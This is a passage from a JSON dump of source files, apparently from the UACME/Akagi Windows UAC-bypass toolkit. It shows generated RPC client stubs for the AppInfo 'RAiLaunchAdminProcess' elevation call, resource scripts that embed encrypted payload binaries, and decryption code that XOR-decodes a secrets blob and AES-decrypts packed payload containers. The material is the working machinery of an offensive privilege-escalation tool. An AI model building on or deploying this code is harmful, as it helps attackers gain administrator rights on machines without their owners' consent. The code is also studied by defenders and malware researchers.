),\t/* 24 */\n/* 60 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 62 */\tNdrFcShort( 0x0 ),\t/* Offset= 0 (62) */\n/* 64 */\t0xb9,\t\t/* FC_UINT3264 */\n\t\t\t0xb9,\t\t/* FC_UINT3264 */\n/* 66 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x8,\t\t/* FC_LONG */\n/* 68 */\t0x5c,\t\t/* FC_PAD */\n\t\t\t0x5b,\t\t/* FC_END */\n/* 70 */\t\n\t\t\t0x11, 0xc,\t/* FC_RP [alloced_on_stack] [simple_pointer] */\n/* 72 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x5c,\t\t/* FC_PAD */\n\n\t\t\t0x0\n }\n };\n\nstatic const unsigned short LaunchAdminProcess_FormatStringOffsetTable[] =\n {\n 0\n };\n\n\nstatic const MIDL_STUB_DESC LaunchAdminProcess_StubDesc = \n {\n (void *)& LaunchAdminProcess___RpcClientInterface,\n MIDL_user_allocate,\n MIDL_user_free,\n &LaunchAdminProcess__MIDL_AutoBindHandle,\n 0,\n 0,\n 0,\n 0,\n appinfo__MIDL_TypeFormatString.Format,\n 1, /* -error bounds_check flag */\n 0x50002, /* Ndr library version */\n 0,\n 0x801026e, /* MIDL Version 8.1.622 */\n 0,\n 0,\n 0, /* notify & notify_flag routine table */\n 0x1, /* MIDL flag */\n 0, /* cs routines */\n 0, /* proxy/server info */\n 0\n };\n#if _MSC_VER >= 1200\n#pragma warning(pop)\n#endif\n#else\n#pragma warning(disable:4206)\n#endif /* defined(_M_AMD64)*/\n"
},
{
"path": "Source/Akagi/appinfo/x64/appinfo64.h",
"content": "\n\n/* this ALWAYS GENERATED file contains the definitions for the interfaces */\n\n\n /* File created by MIDL compiler version 8.01.0622 */\n/* at Mon Jan 18 19:14:07 2038\n */\n/* Compiler settings for appinfo.idl:\n Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 \n protocol : dce , ms_ext, c_ext, robust\n error checks: allocation ref bounds_check enum stub_data \n VC __declspec() decoration level: \n __declspec(uuid()), __declspec(selectany), __declspec(novtable)\n DECLSPEC_UUID(), MIDL_INTERFACE()\n*/\n/* @@MIDL_FILE_HEADING( ) */\n\n#pragma warning( disable: 4049 ) /* more than 64k source lines */\n\n\n/* verify that the version is high enough to compile this file*/\n#ifndef __REQUIRED_RPCNDR_H_VERSION__\n#define __REQUIRED_RPCNDR_H_VERSION__ 475\n#endif\n\n#include \"rpc.h\"\n#include \"rpcndr.h\"\n\n#ifndef __RPCNDR_H_VERSION__\n#error this stub requires an updated version of \n#endif /* __RPCNDR_H_VERSION__ */\n\n\n#ifndef __appinfo64_h__\n#define __appinfo64_h__\n\n#if defined(_MSC_VER) && (_MSC_VER >= 1020)\n#pragma once\n#endif\n\n/* Forward Declarations */ \n\n/* header files for imported files */\n#include \"oaidl.h\"\n#include \"ocidl.h\"\n\n#ifdef __cplusplus\nextern \"C\"{\n#endif \n\n\n#ifndef __LaunchAdminProcess_INTERFACE_DEFINED__\n#define __LaunchAdminProcess_INTERFACE_DEFINED__\n\n/* interface LaunchAdminProcess */\n/* [version][uuid] */ \n\ntypedef struct _MONITOR_POINT\n {\n long MonitorLeft;\n long MonitorRight;\n } \tMONITOR_POINT;\n\ntypedef struct _APP_STARTUP_INFO\n {\n wchar_t *lpszTitle;\n long dwX;\n long dwY;\n long dwXSize;\n long dwYSize;\n long dwXCountChars;\n long dwYCountChars;\n long dwFillAttribute;\n long dwFlags;\n short wShowWindow;\n struct _MONITOR_POINT MonitorPoint;\n } \tAPP_STARTUP_INFO;\n\ntypedef struct _APP_PROCESS_INFORMATION\n {\n unsigned __int3264 ProcessHandle;\n unsigned __int3264 ThreadHandle;\n long ProcessId;\n long ThreadId;\n } \tAPP_PROCESS_INFORMATION;\n\n/* [async] */ void RAiLaunchAdminProcess( \n /* [in] */ PRPC_ASYNC_STATE RAiLaunchAdminProcess_AsyncHandle,\n handle_t hBinding,\n /* [string][unique][in] */ wchar_t *ExecutablePath,\n /* [string][unique][in] */ wchar_t *CommandLine,\n /* [in] */ long StartFlags,\n /* [in] */ long CreationFlags,\n /* [string][in] */ wchar_t *CurrentDirectory,\n /* [string][in] */ wchar_t *WindowStation,\n /* [in] */ struct _APP_STARTUP_INFO *StartupInfo,\n /* [in] */ unsigned __int3264 hWnd,\n /* [in] */ long Timeout,\n /* [out] */ struct _APP_PROCESS_INFORMATION *ProcessInformation,\n /* [out] */ long *ElevationType);\n\n\n\nextern RPC_IF_HANDLE LaunchAdminProcess_v1_0_c_ifspec;\nextern RPC_IF_HANDLE LaunchAdminProcess_v1_0_s_ifspec;\n#endif /* __LaunchAdminProcess_INTERFACE_DEFINED__ */\n\n/* Additional Prototypes for ALL interfaces */\n\n/* end of Additional Prototypes */\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif\n\n\n"
},
{
"path": "Source/Akagi/appinfo/x86-32/appinfo32.c",
"content": "\n\n/* this ALWAYS GENERATED file contains the RPC client stubs */\n\n\n /* File created by MIDL compiler version 8.01.0622 */\n/* at Mon Jan 18 19:14:07 2038\n */\n/* Compiler settings for appinfo.idl:\n Oicf, W1, Zp8, env=Win32 (32b run), target_arch=X86 8.01.0622 \n protocol : dce , ms_ext, c_ext, robust\n error checks: allocation ref bounds_check enum stub_data \n VC __declspec() decoration level: \n __declspec(uuid()), __declspec(selectany), __declspec(novtable)\n DECLSPEC_UUID(), MIDL_INTERFACE()\n*/\n/* @@MIDL_FILE_HEADING( ) */\n\n#if !defined(_M_IA64) && !defined(_M_AMD64) && !defined(_ARM_)\n\n\n#pragma warning( disable: 4049 ) /* more than 64k source lines */\n#if _MSC_VER >= 1200\n#pragma warning(push)\n#endif\n\n#pragma warning( disable: 4211 ) /* redefine extern to static */\n#pragma warning( disable: 4232 ) /* dllimport identity*/\n#pragma warning( disable: 4024 ) /* array to pointer mapping*/\n#pragma warning( disable: 4100 ) /* unreferenced arguments in x86 call */\n\n#pragma optimize(\"\", off ) \n\n#include \"appinfo32.h\"\n\n#define TYPE_FORMAT_STRING_SIZE 75 \n#define PROC_FORMAT_STRING_SIZE 101 \n#define EXPR_FORMAT_STRING_SIZE 1 \n#define TRANSMIT_AS_TABLE_SIZE 0 \n#define WIRE_MARSHAL_TABLE_SIZE 0 \n\ntypedef struct _appinfo_MIDL_TYPE_FORMAT_STRING\n {\n short Pad;\n unsigned char Format[ TYPE_FORMAT_STRING_SIZE ];\n } appinfo_MIDL_TYPE_FORMAT_STRING;\n\ntypedef struct _appinfo_MIDL_PROC_FORMAT_STRING\n {\n short Pad;\n unsigned char Format[ PROC_FORMAT_STRING_SIZE ];\n } appinfo_MIDL_PROC_FORMAT_STRING;\n\ntypedef struct _appinfo_MIDL_EXPR_FORMAT_STRING\n {\n long Pad;\n unsigned char Format[ EXPR_FORMAT_STRING_SIZE ];\n } appinfo_MIDL_EXPR_FORMAT_STRING;\n\n\nstatic const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax = \n{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};\n\n\nextern const appinfo_MIDL_TYPE_FORMAT_STRING appinfo__MIDL_TypeFormatString;\nextern const appinfo_MIDL_PROC_FORMAT_STRING appinfo__MIDL_ProcFormatString;\nextern const appinfo_MIDL_EXPR_FORMAT_STRING appinfo__MIDL_ExprFormatString;\n\n#define GENERIC_BINDING_TABLE_SIZE 0 \n\n\n/* Standard interface: LaunchAdminProcess, ver. 1.0,\n GUID={0x201ef99a,0x7fa0,0x444c,{0x93,0x99,0x19,0xba,0x84,0xf1,0x2a,0x1a}} */\n\n\n\nstatic const RPC_CLIENT_INTERFACE LaunchAdminProcess___RpcClientInterface =\n {\n sizeof(RPC_CLIENT_INTERFACE),\n {{0x201ef99a,0x7fa0,0x444c,{0x93,0x99,0x19,0xba,0x84,0xf1,0x2a,0x1a}},{1,0}},\n {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},\n 0,\n 0,\n 0,\n 0,\n 0,\n 0x00000000\n };\nRPC_IF_HANDLE LaunchAdminProcess_v1_0_c_ifspec = (RPC_IF_HANDLE)& LaunchAdminProcess___RpcClientInterface;\n\nextern const MIDL_STUB_DESC LaunchAdminProcess_StubDesc;\n\nstatic RPC_BINDING_HANDLE LaunchAdminProcess__MIDL_AutoBindHandle;\n\n\n/* [async] */ void RAiLaunchAdminProcess( \n /* [in] */ PRPC_ASYNC_STATE RAiLaunchAdminProcess_AsyncHandle,\n handle_t hBinding,\n /* [string][unique][in] */ wchar_t *ExecutablePath,\n /* [string][unique][in] */ wchar_t *CommandLine,\n /* [in] */ long StartFlags,\n /* [in] */ long CreationFlags,\n /* [string][in] */ wchar_t *CurrentDirectory,\n /* [string][in] */ wchar_t *WindowStation,\n /* [in] */ struct _APP_STARTUP_INFO *StartupInfo,\n /* [in] */ unsigned __int3264 hWnd,\n /* [in] */ long Timeout,\n /* [out] */ struct _APP_PROCESS_INFORMATION *ProcessInformation,\n /* [out] */ long *ElevationType)\n{\n\n NdrAsyncClientCall(\n ( PMIDL_STUB_DESC )&LaunchAdminProcess_StubDesc,\n (PFORMAT_STRING) &appinfo__MIDL_ProcFormatString.Format[0],\n ( unsigned char * )&RAiLaunchAdminProcess_AsyncHandle);\n \n}\n\n\n#if !defined(__RPC_WIN32__)\n#error Invalid build platform for this stub.\n#endif\n\n#if !(TARGET_IS_NT50_OR_LATER)\n#error You need Windows 2000 or later to run this stub because it uses these features:\n#error [async] attribute, /robust command line switch.\n#error However, your C/C++ compilation flags indicate you intend to run this app on earlier systems.\n#error This app will fail with the RPC_X_WRONG_STUB_VERSION error.\n#endif\n\n\nstatic const appinfo_MIDL_PROC_FORMAT_STRING appinfo__MIDL_ProcFormatString =\n {\n 0,\n {\n\n\t/* Procedure RAiLaunchAdminProcess */\n\n\t\t\t0x0,\t\t/* 0 */\n\t\t\t0x48,\t\t/* Old Flags: */\n/* 2 */\tNdrFcLong( 0x0 ),\t/* 0 */\n/* 6 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 8 */\tNdrFcShort( 0x38 ),\t/* x86 Stack size/offset = 56 */\n/* 10 */\t0x32,\t\t/* FC_BIND_PRIMITIVE */\n\t\t\t0x0,\t\t/* 0 */\n/* 12 */\tNdrFcShort( 0x4 ),\t/* x86 Stack size/offset = 4 */\n/* 14 */\tNdrFcShort( 0x9a ),\t/* 154 */\n/* 16 */\tNdrFcShort( 0x58 ),\t/* 88 */\n/* 18 */\t0xc6,\t\t/* Oi2 Flags: clt must size, has return, has ext, has async handle */\n\t\t\t0xc,\t\t/* 12 */\n/* 20 */\t0x8,\t\t/* 8 */\n\t\t\t0x1,\t\t/* Ext Flags: new corr desc, */\n/* 22 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 24 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 26 */\tNdrFcShort( 0x0 ),\t/* 0 */\n\n\t/* Parameter ExecutablePath */\n\n/* 28 */\tNdrFcShort( 0xb ),\t/* Flags: must size, must free, in, */\n/* 30 */\tNdrFcShort( 0x8 ),\t/* x86 Stack size/offset = 8 */\n/* 32 */\tNdrFcShort( 0x2 ),\t/* Type Offset=2 */\n\n\t/* Parameter CommandLine */\n\n/* 34 */\tNdrFcShort( 0xb ),\t/* Flags: must size, must free, in, */\n/* 36 */\tNdrFcShort( 0xc ),\t/* x86 Stack size/offset = 12 */\n/* 38 */\tNdrFcShort( 0x2 ),\t/* Type Offset=2 */\n\n\t/* Parameter StartFlags */\n\n/* 40 */\tNdrFcShort( 0x48 ),\t/* Flags: in, base type, */\n/* 42 */\tNdrFcShort( 0x10 ),\t/* x86 Stack size/offset = 16 */\n/* 44 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Parameter CreationFlags */\n\n/* 46 */\tNdrFcShort( 0x48 ),\t/* Flags: in, base type, */\n/* 48 */\tNdrFcShort( 0x14 ),\t/* x86 Stack size/offset = 20 */\n/* 50 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Parameter CurrentDirectory */\n\n/* 52 */\tNdrFcShort( 0x10b ),\t/* Flags: must size, must free, in, simple ref, */\n/* 54 */\tNdrFcShort( 0x18 ),\t/* x86 Stack size/offset = 24 */\n/* 56 */\tNdrFcShort( 0x8 ),\t/* Type Offset=8 */\n\n\t/* Parameter WindowStation */\n\n/* 58 */\tNdrFcShort( 0x10b ),\t/* Flags: must size, must free, in, simple ref, */\n/* 60 */\tNdrFcShort( 0x1c ),\t/* x86 Stack size/offset = 28 */\n/* 62 */\tNdrFcShort( 0x8 ),\t/* Type Offset=8 */\n\n\t/* Parameter StartupInfo */\n\n/* 64 */\tNdrFcShort( 0x10a ),\t/* Flags: must free, in, simple ref, */\n/* 66 */\tNdrFcShort( 0x20 ),\t/* x86 Stack size/offset = 32 */\n/* 68 */\tNdrFcShort( 0x16 ),\t/* Type Offset=22 */\n\n\t/* Parameter hWnd */\n\n/* 70 */\tNdrFcShort( 0x48 ),\t/* Flags: in, base type, */\n/* 72 */\tNdrFcShort( 0x24 ),\t/* x86 Stack size/offset = 36 */\n/* 74 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Parameter Timeout */\n\n/* 76 */\tNdrFcShort( 0x48 ),\t/* Flags: in, base type, */\n/* 78 */\tNdrFcShort( 0x28 ),\t/* x86 Stack size/offset = 40 */\n/* 80 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Parameter ProcessInformation */\n\n/* 82 */\tNdrFcShort( 0x4112 ),\t/* Flags: must free, out, simple ref, srv alloc size=16 */\n/* 84 */\tNdrFcShort( 0x2c ),\t/* x86 Stack size/offset = 44 */\n/* 86 */\tNdrFcShort( 0x3c ),\t/* Type Offset=60 */\n\n\t/* Parameter ElevationType */\n\n/* 88 */\tNdrFcShort( 0x2150 ),\t/* Flags: out, base type, simple ref, srv alloc size=8 */\n/* 90 */\tNdrFcShort( 0x30 ),\t/* x86 Stack size/offset = 48 */\n/* 92 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Return value */\n\n/* 94 */\tNdrFcShort( 0x70 ),\t/* Flags: out, return, base type, */\n/* 96 */\tNdrFcShort( 0x34 ),\t/* x86 Stack size/offset = 52 */\n/* 98 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t\t\t0x0\n }\n };\n\nstatic const appinfo_MIDL_TYPE_FORMAT_STRING appinfo__MIDL_TypeFormatString =\n {\n 0,\n {\n\t\t\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 2 */\t\n\t\t\t0x12, 0x8,\t/* FC_UP [simple_pointer] */\n/* 4 */\t\n\t\t\t0x25,\t\t/* FC_C_WSTRING */\n\t\t\t0x5c,\t\t/* FC_PAD */\n/* 6 */\t\n\t\t\t0x11, 0x8,\t/* FC_RP [simple_pointer] */\n/* 8 */\t\n\t\t\t0x25,\t\t/* FC_C_WSTRING */\n\t\t\t0x5c,\t\t/* FC_PAD */\n/* 10 */\t\n\t\t\t0x11, 0x0,\t/* FC_RP */\n/* 12 */\tNdrFcShort( 0xa ),\t/* Offset= 10 (22) */\n/* 14 */\t\n\t\t\t0x15,\t\t/* FC_STRUCT */\n\t\t\t0x3,\t\t/* 3 */\n/* 16 */\tNdrFcShort( 0x8 ),\t/* 8 */\n/* 18 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x8,\t\t/* FC_LONG */\n/* 20 */\t0x5c,\t\t/* FC_PAD */\n\t\t\t0x5b,\t\t/* FC_END */\n/* 22 */\t\n\t\t\t0x16,\t\t/* FC_PSTRUCT */\n\t\t\t0x3,\t\t/* 3 */\n/* 24 */\tNdrFcShort( 0x30 ),\t/* 48 */\n/* 26 */\t\n\t\t\t0x4b,\t\t/* FC_PP */\n\t\t\t0x5c,\t\t/* FC_PAD */\n/* 28 */\t\n\t\t\t0x46,\t\t/* FC_NO_REPEAT */\n\t\t\t0x5c,\t\t/* FC_PAD */\n/* 30 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 32 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 34 */\t0x12, 0x8,\t/* FC_UP [simple_pointer] */\n/* 36 */\t0x5,\t\t/* FC_WCHAR */\n\t\t\t0x5c,\t\t/* FC_PAD */\n/* 38 */\t\n\t\t\t0x5b,\t\t/* FC_END */\n\n\t\t\t0x8,\t\t/* FC_LONG */\n/* 40 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x8,\t\t/* FC_LONG */\n/* 42 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x8,\t\t/* FC_LONG */\n/* 44 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x8,\t\t/* FC_LONG */\n/* 46 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x8,\t\t/* FC_LONG */\n/* 48 */\t0x6,\t\t/* FC_SHORT */\n\t\t\t0x3e,\t\t/* FC_STRUCTPAD2 */\n/* 50 */\t0x4c,\t\t/* FC_EMBEDDED_COMPLEX */\n\t\t\t0x0,\t\t/* 0 */\n/* 52 */\tNdrFcShort( 0xffda ),\t/* Offset= -38 (14) */\n/* 54 */\t0x5c,\t\t/* FC_PAD */\n\t\t\t0x5b,\t\t/* FC_END */\n/* 56 */\t\n\t\t\t0x11, 0x4,\t/* FC_RP [alloced_on_stack] */\n/* 58 */\tNdrFcShort( 0x2 ),\t/* Offset= 2 (60) */\n/* 60 */\t\n\t\t\t0x15,\t\t/* FC_STRUCT */\n\t\t\t0x3,\t\t/* 3 */\n/* 62 */\tNdrFcShort( 0x10 ),\t/* 16 */\n/* 64 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x8,\t\t/* FC_LONG */\n/* 66 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x8,\t\t/* FC_LONG */\n/* 68 */\t0x5c,\t\t/* FC_PAD */\n\t\t\t0x5b,\t\t/* FC_END */\n/* 70 */\t\n\t\t\t0x11, 0xc,\t/* FC_RP [alloced_on_stack] [simple_pointer] */\n/* 72 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x5c,\t\t/* FC_PAD */\n\n\t\t\t0x0\n }\n };\n\nstatic const unsigned short LaunchAdminProcess_FormatStringOffsetTable[] =\n {\n 0\n };\n\n\nstatic const MIDL_STUB_DESC LaunchAdminProcess_StubDesc = \n {\n (void *)& LaunchAdminProcess___RpcClientInterface,\n MIDL_user_allocate,\n MIDL_user_free,\n &LaunchAdminProcess__MIDL_AutoBindHandle,\n 0,\n 0,\n 0,\n 0,\n appinfo__MIDL_TypeFormatString.Format,\n 1, /* -error bounds_check flag */\n 0x50002, /* Ndr library version */\n 0,\n 0x801026e, /* MIDL Version 8.1.622 */\n 0,\n 0,\n 0, /* notify & notify_flag routine table */\n 0x1, /* MIDL flag */\n 0, /* cs routines */\n 0, /* proxy/server info */\n 0\n };\n#if _MSC_VER >= 1200\n#pragma warning(pop)\n#endif\n\n#else\n#pragma warning(disable:4206)\n#endif /* !defined(_M_IA64) && !defined(_M_AMD64) && !defined(_ARM_) */\n\n"
},
{
"path": "Source/Akagi/appinfo/x86-32/appinfo32.h",
"content": "\n\n/* this ALWAYS GENERATED file contains the definitions for the interfaces */\n\n\n /* File created by MIDL compiler version 8.01.0622 */\n/* at Mon Jan 18 19:14:07 2038\n */\n/* Compiler settings for appinfo.idl:\n Oicf, W1, Zp8, env=Win32 (32b run), target_arch=X86 8.01.0622 \n protocol : dce , ms_ext, c_ext, robust\n error checks: allocation ref bounds_check enum stub_data \n VC __declspec() decoration level: \n __declspec(uuid()), __declspec(selectany), __declspec(novtable)\n DECLSPEC_UUID(), MIDL_INTERFACE()\n*/\n/* @@MIDL_FILE_HEADING( ) */\n\n#pragma warning( disable: 4049 ) /* more than 64k source lines */\n\n\n/* verify that the version is high enough to compile this file*/\n#ifndef __REQUIRED_RPCNDR_H_VERSION__\n#define __REQUIRED_RPCNDR_H_VERSION__ 475\n#endif\n\n#include \"rpc.h\"\n#include \"rpcndr.h\"\n\n#ifndef __RPCNDR_H_VERSION__\n#error this stub requires an updated version of \n#endif /* __RPCNDR_H_VERSION__ */\n\n\n#ifndef __appinfo32_h__\n#define __appinfo32_h__\n\n#if defined(_MSC_VER) && (_MSC_VER >= 1020)\n#pragma once\n#endif\n\n/* Forward Declarations */ \n\n/* header files for imported files */\n#include \"oaidl.h\"\n#include \"ocidl.h\"\n\n#ifdef __cplusplus\nextern \"C\"{\n#endif \n\n\n#ifndef __LaunchAdminProcess_INTERFACE_DEFINED__\n#define __LaunchAdminProcess_INTERFACE_DEFINED__\n\n/* interface LaunchAdminProcess */\n/* [version][uuid] */ \n\ntypedef struct _MONITOR_POINT\n {\n long MonitorLeft;\n long MonitorRight;\n } \tMONITOR_POINT;\n\ntypedef struct _APP_STARTUP_INFO\n {\n wchar_t *lpszTitle;\n long dwX;\n long dwY;\n long dwXSize;\n long dwYSize;\n long dwXCountChars;\n long dwYCountChars;\n long dwFillAttribute;\n long dwFlags;\n short wShowWindow;\n struct _MONITOR_POINT MonitorPoint;\n } \tAPP_STARTUP_INFO;\n\ntypedef struct _APP_PROCESS_INFORMATION\n {\n unsigned __int3264 ProcessHandle;\n unsigned __int3264 ThreadHandle;\n long ProcessId;\n long ThreadId;\n } \tAPP_PROCESS_INFORMATION;\n\n/* [async] */ void RAiLaunchAdminProcess( \n /* [in] */ PRPC_ASYNC_STATE RAiLaunchAdminProcess_AsyncHandle,\n handle_t hBinding,\n /* [string][unique][in] */ wchar_t *ExecutablePath,\n /* [string][unique][in] */ wchar_t *CommandLine,\n /* [in] */ long StartFlags,\n /* [in] */ long CreationFlags,\n /* [string][in] */ wchar_t *CurrentDirectory,\n /* [string][in] */ wchar_t *WindowStation,\n /* [in] */ struct _APP_STARTUP_INFO *StartupInfo,\n /* [in] */ unsigned __int3264 hWnd,\n /* [in] */ long Timeout,\n /* [out] */ struct _APP_PROCESS_INFORMATION *ProcessInformation,\n /* [out] */ long *ElevationType);\n\n\n\nextern RPC_IF_HANDLE LaunchAdminProcess_v1_0_c_ifspec;\nextern RPC_IF_HANDLE LaunchAdminProcess_v1_0_s_ifspec;\n#endif /* __LaunchAdminProcess_INTERFACE_DEFINED__ */\n\n/* Additional Prototypes for ALL interfaces */\n\n/* end of Additional Prototypes */\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif\n\n\n"
},
{
"path": "Source/Akagi/bin/Akatsuki64.cd",
"content": ""
},
{
"path": "Source/Akagi/bin/Fubuki32.cd",
"content": ""
},
{
"path": "Source/Akagi/bin/Fubuki64.cd",
"content": ""
},
{
"path": "Source/Akagi/bin/Kamikaze.cd",
"content": ""
},
{
"path": "Source/Akagi/bin32res.rc",
"content": "#include \"bin32res.h\"\n#include \"winres.h\"\nLANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US\nIDR_FUBUKI32 RCDATA \"bin\\\\fubuki32.cd\"\nIDR_KAMIKAZE RCDATA \"bin\\\\kamikaze.cd\"\nIDR_SECRETS RCDATA \"bin\\\\secrets32.bin\"\n"
},
{
"path": "Source/Akagi/bin64res.rc",
"content": "#include \"bin64res.h\"\n#include \"winres.h\"\nLANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US\nIDR_FUBUKI64 RCDATA \"bin\\\\fubuki64.cd\"\nIDR_FUBUKI32 RCDATA \"bin\\\\fubuki32.cd\"\nIDR_AKATSUKI64 RCDATA \"bin\\\\akatsuki64.cd\"\nIDR_KAMIKAZE RCDATA \"bin\\\\kamikaze.cd\"\nIDR_SECRETS RCDATA \"bin\\\\secrets64.bin\"\n"
},
{
"path": "Source/Akagi/compress.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2014 - 2026\n*\n* TITLE: COMPRESS.C\n*\n* VERSION: 3.69\n*\n* DATE: 12 Feb 2026\n*\n* Compression and encoding/decoding support.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n#include \"encresource.h\"\n\n#pragma comment(lib, \"msdelta.lib\")\n#pragma comment(lib, \"Bcrypt.lib\")\n\n#define UACME_KEY_SIZE 32\n\ntypedef struct _DCK_HEADER {\n DWORD Id;\n BYTE Data[UACME_KEY_SIZE];\n} DCK_HEADER, * PDCK_HEADER;\n\n/*\n* EncodeBuffer\n*\n* Purpose:\n*\n* Decrypt/Encrypt given buffer.\n*\n*/\nVOID EncodeBuffer(\n _In_ PVOID Buffer,\n _In_ ULONG BufferSize,\n _In_ ULONG Key\n)\n{\n ULONG k, c;\n PUCHAR ptr;\n\n if ((Buffer == NULL) || (BufferSize == 0))\n return;\n\n k = Key;\n c = BufferSize;\n ptr = (PUCHAR)Buffer;\n\n do {\n *ptr ^= k;\n k = _rotl(k, 1);\n ptr++;\n --c;\n } while (c != 0);\n}\n\n/*\n* SelectSecretFromBlob\n*\n* Purpose:\n*\n* Return key used for decryption by Id from secrets blob.\n*\n* Use supHeapFree to release allocated result.\n*\n*/\nPVOID SelectSecretFromBlob(\n _In_ ULONG Id,\n _Out_ PDWORD pcbKeyBlob\n)\n{\n ULONG i, c;\n ULONG dataSize = 0;\n PDCK_HEADER secretsBlob;\n PVOID pbSecret = NULL, resourceBlob;\n\n if (pcbKeyBlob)\n *pcbKeyBlob = 0;\n\n resourceBlob = supLdrQueryResourceData(SECRETS_ID,\n g_hInstance,\n &dataSize);\n\n if (resourceBlob) {\n\n secretsBlob = (PDCK_HEADER)supHeapAlloc(dataSize);\n if (secretsBlob) {\n\n RtlCopyMemory(secretsBlob, resourceBlob, dataSize);\n EncodeBuffer(secretsBlob, dataSize, AKAGI_XOR_KEY);\n\n c = dataSize / sizeof(DCK_HEADER);\n for (i = 0; i < c; i++) {\n if (secretsBlob[i].Id == Id) {\n pbSecret = supHeapAlloc(UACME_KEY_SIZE);\n if (pbSecret != NULL) {\n RtlCopyMemory(pbSecret, secretsBlob[i].Data, UACME_KEY_SIZE);\n if (pcbKeyBlob)\n *pcbKeyBlob = UACME_KEY_SIZE;\n }\n break;\n }\n }\n\n RtlSecureZeroMemory(secretsBlob, dataSize);\n supHeapFree(secretsBlob);\n }\n\n }\n\n return pbSecret;\n}\n\n/*\n* IsValidContainerHeader\n*\n* Purpose:\n*\n* Basic santity checks over container header.\n*\n*/\nBOOL IsValidContainerHeader(\n _In_ PDCU_HEADER UnitHeader,\n _In_ DWORD FileSize\n)\n{\n DWORD HeaderCrc;\n\n if (UnitHeader == NULL)\n return FALSE;\n\n __try {\n if ((UnitHeader->Magic != UACME_CONTAINER_PACKED_DATA) && //Naka\n (UnitHeader->Magic != UACME_CONTAINER_PACKED_UNIT) && //Naka\n (UnitHeader->Magic != UACME_CONTAINER_PACKED_CODE) && //Kuma\n (UnitHeader->Magic != UACME_CONTAINER_PACKED_KEYS)) //Kuma\n {\n return FALSE;\n }\n\n //\n // Note that IV has different meaning in Kuma containers.\n //\n\n HeaderCrc = UnitHeader->HeaderCrc;\n UnitHeader->HeaderCrc = 0;\n if (RtlComputeCrc32(0, UnitHeader, sizeof(DCU_HEADER)) != HeaderCrc) {\n UnitHeader->HeaderCrc = HeaderCrc;\n return FALSE;\n }\n UnitHeader->HeaderCrc = HeaderCrc;\n\n if ((UnitHeader->cbData == 0) ||\n (UnitHeader->cbDeltaSize == 0))\n return FALSE;\n if (UnitHeader->cbData > FileSize)\n return FALSE;\n if (UnitHeader->cbDeltaSize > FileSize)\n return FALSE;\n if (UnitHeader->cbDeltaSize > UnitHeader->cbData)\n return FALSE;\n }\n __except (EXCEPTION_EXECUTE_HANDLER) {\n return FALSE;\n }\n\n return TRUE;\n}\n\n/*\n* DecryptBuffer\n*\n* Purpose:\n*\n* Decrypt AES encrypted buffer.\n*\n* Use supVirtualFree to release allocated result.\n*\n*/\nBOOL DecryptBuffer(\n _In_ PBYTE pbBuffer,\n _In_ DWORD cbBuffer,\n _In_ PBYTE pbIV,\n _In_ PBYTE pbSecret,\n _In_ DWORD cbSecret,\n _Out_ PBYTE *pbDecryptedBuffer,\n _Out_ PDWORD pcbDecryptedBuffer\n)\n{\n BOOL bResult = FALSE;\n BCRYPT_ALG_HANDLE hAlgAes = NULL;\n BCRYPT_KEY_HANDLE hKey = NULL;\n HANDLE heapCNG = NULL;\n DWORD cbCipherData, cbKeyObject, cbResult, cbBlockLen;\n PBYTE pbKeyObject = NULL, pbCipherData = NULL;\n SIZE_T memIO;\n NTSTATUS status;\n\n do {\n\n heapCNG = HeapCreate(0, 0, 0);\n if (heapCNG == NULL)\n break;\n\n if (!NT_SUCCESS(BCryptOpenAlgorithmProvider(\n &hAlgAes,\n BCRYPT_AES_ALGORITHM,\n NULL,\n 0)))\n {\n break;\n }\n\n cbKeyObject = 0;\n cbResult = 0;\n\n if (!NT_SUCCESS(BCryptGetProperty(\n hAlgAes,\n BCRYPT_OBJECT_LENGTH,\n (PUCHAR)&cbKeyObject,\n sizeof(DWORD),\n &cbResult,\n 0)))\n {\n break;\n }\n\n pbKeyObject = (PBYTE)HeapAlloc(heapCNG, HEAP_ZERO_MEMORY, cbKeyObject);\n if (pbKeyObject == NULL)\n break;\n\n cbBlockLen 